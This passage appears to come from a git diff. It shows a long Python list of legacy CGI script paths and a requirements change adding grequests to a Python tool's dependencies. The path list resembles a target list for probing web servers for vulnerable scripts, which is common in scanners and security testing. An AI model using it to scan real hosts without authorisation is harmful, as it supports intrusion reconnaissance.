||||||
|
r'/dcforum/dcforum.cgi',
|
||||||
|
r'/debuff.cgi',
|
||||||
|
r'/debug.cgi',
|
||||||
|
r'/details.cgi',
|
||||||
|
r'/edittag/edittag.cgi',
|
||||||
|
r'/emumail.cgi',
|
||||||
|
r'/enter_buff.cgi',
|
||||||
|
r'/enter_bug.cgi',
|
||||||
|
r'/ez2000/ezadmin.cgi',
|
||||||
|
r'/ez2000/ezboard.cgi',
|
||||||
|
r'/ez2000/ezman.cgi',
|
||||||
|
r'/fcgi-bin/echo',
|
||||||
|
r'/fcgi-bin/echo',
|
||||||
|
r'/fcgi-bin/echo2',
|
||||||
|
r'/fcgi-bin/echo2',
|
||||||
|
r'/Gozila.cgi',
|
||||||
|
r'/hitmatic/analyse.cgi',
|
||||||
|
r'/hp_docs/cgi-bin/index.cgi',
|
||||||
|
r'/html/cgi-bin/cgicso',
|
||||||
|
r'/html/cgi-bin/cgicso',
|
||||||
|
r'/index.cgi',
|
||||||
|
r'/info.cgi',
|
||||||
|
r'/infosrch.cgi',
|
||||||
|
r'/login.cgi',
|
||||||
|
r'/mailview.cgi',
|
||||||
|
r'/main.cgi',
|
||||||
|
r'/megabook/admin.cgi',
|
||||||
|
r'/ministats/admin.cgi',
|
||||||
|
r'/mods/apage/apage.cgi',
|
||||||
|
r'/_mt/mt.cgi',
|
||||||
|
r'/musicqueue.cgi',
|
||||||
|
r'/ncbook.cgi',
|
||||||
|
r'/newpro.cgi',
|
||||||
|
r'/newsletter.sh',
|
||||||
|
r'/oem_webstage/cgi-bin/oemapp_cgi',
|
||||||
|
r'/page.cgi',
|
||||||
|
r'/parse_xml.cgi',
|
||||||
|
r'/photodata/manage.cgi',
|
||||||
|
r'/photo/manage.cgi',
|
||||||
|
r'/print.cgi',
|
||||||
|
r'/process_buff.cgi',
|
||||||
|
r'/process_bug.cgi',
|
||||||
|
r'/pub/english.cgi',
|
||||||
|
r'/quikmail/nph-emumail.cgi',
|
||||||
|
r'/quikstore.cgi',
|
||||||
|
r'/reviews/newpro.cgi',
|
||||||
|
r'/ROADS/cgi-bin/search.pl',
|
||||||
|
r'/sample01.cgi',
|
||||||
|
r'/sample02.cgi',
|
||||||
|
r'/sample03.cgi',
|
||||||
|
r'/sample04.cgi',
|
||||||
|
r'/sampleposteddata.cgi',
|
||||||
|
r'/scancfg.cgi',
|
||||||
|
r'/scancfg.cgi',
|
||||||
|
r'/servers/link.cgi',
|
||||||
|
r'/setpasswd.cgi',
|
||||||
|
r'/SetSecurity.shm',
|
||||||
|
r'/shop/member_html.cgi',
|
||||||
|
r'/shop/normal_html.cgi',
|
||||||
|
r'/site_searcher.cgi',
|
||||||
|
r'/siteUserMod.cgi',
|
||||||
|
r'/submit.cgi',
|
||||||
|
r'/technote/print.cgi',
|
||||||
|
r'/template.cgi',
|
||||||
|
r'/test.cgi',
|
||||||
|
r'/ucsm/isSamInstalled.cgi',
|
||||||
|
r'/upload.cgi',
|
||||||
|
r'/userreg.cgi',
|
||||||
|
r'/users/scripts/submit.cgi',
|
||||||
|
r'/vood/cgi-bin/vood_view.cgi',
|
||||||
|
r'/Web_Store/web_store.cgi',
|
||||||
|
r'/webtools/bonsai/ccvsblame.cgi',
|
||||||
|
r'/webtools/bonsai/cvsblame.cgi',
|
||||||
|
r'/webtools/bonsai/cvslog.cgi',
|
||||||
|
r'/webtools/bonsai/cvsquery.cgi',
|
||||||
|
r'/webtools/bonsai/cvsqueryform.cgi',
|
||||||
|
r'/webtools/bonsai/showcheckins.cgi',
|
||||||
|
r'/wwwadmin.cgi',
|
||||||
|
r'/wwwboard.cgi',
|
||||||
|
r'/wwwboard/wwwboard.cgi')
|
|
@ -12,4 +12,5 @@ psutil
|
||||||
PyInstaller
|
PyInstaller
|
||||||
ecdsa
|
ecdsa
|
||||||
netifaces
|
netifaces
|
||||||
requests
|
requests
|
||||||
|
grequests
|
Loading…
Reference in New Issue